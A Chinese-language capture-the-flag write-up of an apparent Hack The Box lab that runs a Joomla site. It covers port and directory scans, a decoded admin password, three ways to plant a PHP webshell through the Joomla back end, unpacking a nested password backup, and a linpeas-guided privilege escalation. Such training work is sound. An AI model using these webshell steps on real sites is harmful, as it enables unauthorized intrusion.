信息收集#
─# nmap -sV 10.129.215.122
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-09 21:59 EST
Nmap scan report for 10.129.215.122
Host is up (0.46s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.04 seconds
根据 ico 识别出是joomla的系统。
目录扫描
┌──(root㉿kali)-[~/Downloads/dirsearch-master]
└─# python3 dirsearch.py -u http://10.129.215.122
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11592
Output: /root/Downloads/dirsearch-master/reports/http_10.129.215.122/_23-01-09_22-06-39.txt
Target: http://10.129.215.122/
[22:06:39] Starting:
[22:06:55] 403 - 279B - /.ht_wsr.txt
[22:06:55] 403 - 279B - /.htaccess.bak1
[22:06:56] 403 - 279B - /.htaccess.orig
[22:06:56] 403 - 279B - /.htaccess.sample
[22:06:56] 403 - 279B - /.htaccess.save
[22:06:56] 403 - 279B - /.htaccess_sc
[22:06:56] 403 - 279B - /.htaccess_extra
[22:06:56] 403 - 279B - /.htaccess_orig
[22:06:56] 403 - 279B - /.htaccessBAK
[22:06:56] 403 - 279B - /.htaccessOLD2
[22:06:56] 403 - 279B - /.html
[22:06:56] 403 - 279B - /.htpasswd_test
[22:06:56] 403 - 279B - /.htm
[22:06:56] 403 - 279B - /.htaccessOLD
[22:06:56] 403 - 279B - /.httr-oauth
[22:06:56] 403 - 279B - /.htpasswds
[22:07:00] 403 - 279B - /.php
[22:07:40] 301 - 324B - /administrator -> http://10.129.215.122/administrator/
[22:07:41] 200 - 2KB - /administrator/
[22:07:41] 200 - 533B - /administrator/includes/
[22:07:41] 200 - 31B - /administrator/cache/
[22:07:41] 200 - 2KB - /administrator/index.php
[22:07:41] 301 - 329B - /administrator/logs -> http://10.129.215.122/administrator/logs/
[22:07:41] 200 - 31B - /administrator/logs/
[22:07:55] 200 - 31B - /bin/
[22:07:55] 301 - 314B - /bin -> http://10.129.215.122/bin/
[22:07:58] 200 - 31B - /cache/
[22:07:58] 301 - 316B - /cache -> http://10.129.215.122/cache/
[22:08:02] 200 - 31B - /cli/
[22:08:04] 200 - 31B - /components/
[22:08:04] 301 - 321B - /components -> http://10.129.215.122/components/
[22:08:06] 200 - 0B - /configuration.php
[22:08:31] 200 - 1KB - /htaccess.txt
[22:08:33] 301 - 317B - /images -> http://10.129.215.122/images/
[22:08:33] 200 - 31B - /images/
[22:08:34] 200 - 31B - /includes/
[22:08:34] 301 - 319B - /includes -> http://10.129.215.122/includes/
[22:08:34] 200 - 4KB - /index.php
[22:08:34] 404 - 3KB - /index.php/login/
[22:08:40] 200 - 31B - /layouts/
[22:08:40] 301 - 319B - /language -> http://10.129.215.122/language/
[22:08:42] 200 - 31B - /libraries/
[22:08:42] 301 - 320B - /libraries -> http://10.129.215.122/libraries/
[22:08:42] 200 - 7KB - /LICENSE.txt
[22:08:49] 301 - 316B - /media -> http://10.129.215.122/media/
[22:08:49] 200 - 31B - /media/
[22:08:53] 301 - 318B - /modules -> http://10.129.215.122/modules/
[22:08:53] 200 - 31B - /modules/
[22:09:10] 301 - 318B - /plugins -> http://10.129.215.122/plugins/
[22:09:10] 200 - 31B - /plugins/
[22:09:17] 200 - 2KB - /README.txt
[22:09:20] 200 - 395B - /robots.txt.dist
[22:09:24] 403 - 279B - /server-status
[22:09:24] 403 - 279B - /server-status/
[22:09:41] 200 - 31B - /templates/index.html
[22:09:41] 301 - 320B - /templates -> http://10.129.215.122/templates/
[22:09:41] 200 - 0B - /templates/system/
[22:09:41] 200 - 31B - /templates/
[22:09:41] 200 - 0B - /templates/beez3/
[22:09:41] 200 - 0B - /templates/protostar/
[22:09:44] 301 - 314B - /tmp -> http://10.129.215.122/tmp/
[22:09:44] 200 - 31B - /tmp/
[22:09:57] 200 - 567B - /web.config.txt
获得了 administrator 后台路径,翻阅了其他文件暂时没有发现可用的东西。
浏览首页发现了一个账户名 Floris。
通过浏览首页源代码发现了注释掉的一个 txt 文件,访问后得到一串编码。
Q3VybGluZzIwMTgh
Curling2018!
登录后台
后台#
关于 jooma 后台 getshell 和 WP 有点类似
第一种
官网下载joomla中文包com_zmaxappstore.zip,解压修改install.xml 添加<filename>>test.php</filename> 将test.php放到admin文件夹内,重新打包zip,后台操作Extensions–> install–>upload package file
shell_url:/administrator/components/{zip包名}/da.php
第二种
后台操作 Global Configuration- ->media–>Legal Extensions (File Types)添加php后缀,媒体上传即可
第三种
后台操作 Extensions–>Templates–>Templates–>xxx Details and Files修改error.php文件 添加shell代码,save保存,
shell_url:/administrator/templates/xxx/error.php
新建一个文件之后写入 php 的一句话然后连接之。
后渗透#
访问 home 目录发现了该文件,但是 user.txt 文件内容为空。
访问 password_backup 文件的时候给出了文件流内容,是一个 hex dump 文件,开头的 Bzh 说明该文件的来由。
https://en.wikipedia.org/wiki/List_of_file_signatures
既然是知道他是一个压缩文件,反转回二进制文件即可。
他当前机器没有权限,所以下载回本地自行解压。
xxd我将使用和-r反向转换回二进制:
root@kali# cat password_backup_orig | xxd -r > password_backup.bz2
root@kali# file password_backup.bz2
password_backup.bz2: bzip2 compressed data, block size = 900k
并解压:
root@kali# bunzip2 -k password_backup.bz2
我将检查结果文件的文件类型,并查看它是否经过 gzip 压缩:
root@kali# file password_backup
password_backup: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix, original size 141
root@kali# mv password_backup password_backup.gz
我会解压缩,然后检查。另一个bz2:
root@kali# gunzip -k password_backup.gz
root@kali# ls
password_backup password_backup.bz2 password_backup.gz password_backup_orig
root@kali# file password_backup
password_backup: bzip2 compressed data, block size = 900k
root@kali# mv password_backup password_backup2.bz2
再次解压,得到一个tar包:
root@kali# bunzip2 -k password_backup2.bz2
root@kali# ls -l
total 48
-rwxrwx--- 1 root vboxsf 10240 Oct 29 16:25 password_backup2
-rwxrwx--- 1 root vboxsf 141 Oct 29 16:25 password_backup2.bz2
-rwxrwx--- 1 root vboxsf 244 Oct 29 16:25 password_backup.bz2
-rwxrwx--- 1 root vboxsf 173 Oct 29 16:25 password_backup.gz
-rwxrwx--- 1 root vboxsf 1076 Oct 29 16:22 password_backup_orig
root@kali# file password_backup2
password_backup2: POSIX tar archive (GNU)
解压,得到一个带密码的文本文件:
root@kali# mv password_backup2 password_backup.tar
root@kali# tar xvf password_backup.tar
password.txt
root@kali# ls -l
total 56
-rwxrwx--- 1 root vboxsf 141 Oct 29 16:25 password_backup2.bz2
-rwxrwx--- 1 root vboxsf 244 Oct 29 16:25 password_backup.bz2
-rwxrwx--- 1 root vboxsf 173 Oct 29 16:25 password_backup.gz
-rwxrwx--- 1 root vboxsf 1076 Oct 29 16:22 password_backup_orig
-rwxrwx--- 1 root vboxsf 10240 Oct 29 16:25 password_backup.tar
-rwxrwx--- 1 root vboxsf 19 May 22 15:15 password.txt
root@kali# cat password.txt
5d<wdCbdZu)|hChXll
在线网站:https://gchq.github.io/CyberChef
选择 bzip 算法即可。
user#
获得密码之后直接 SSH 登录后查看 user 文件
root#
root 实在是找不到办法了,使用了漏洞特权脚本
先使用 SCP 传上去
┌──(root㉿kali)-[~/Desktop]
└─# scp /root/Downloads/linpeas.sh [email protected]:/home/floris
[email protected]'s password:
linpeas.sh
然后执行 bash linpeas.sh,获得了漏洞扫描结果
还是把 4034 的漏洞执行脚本丢上去。
结束。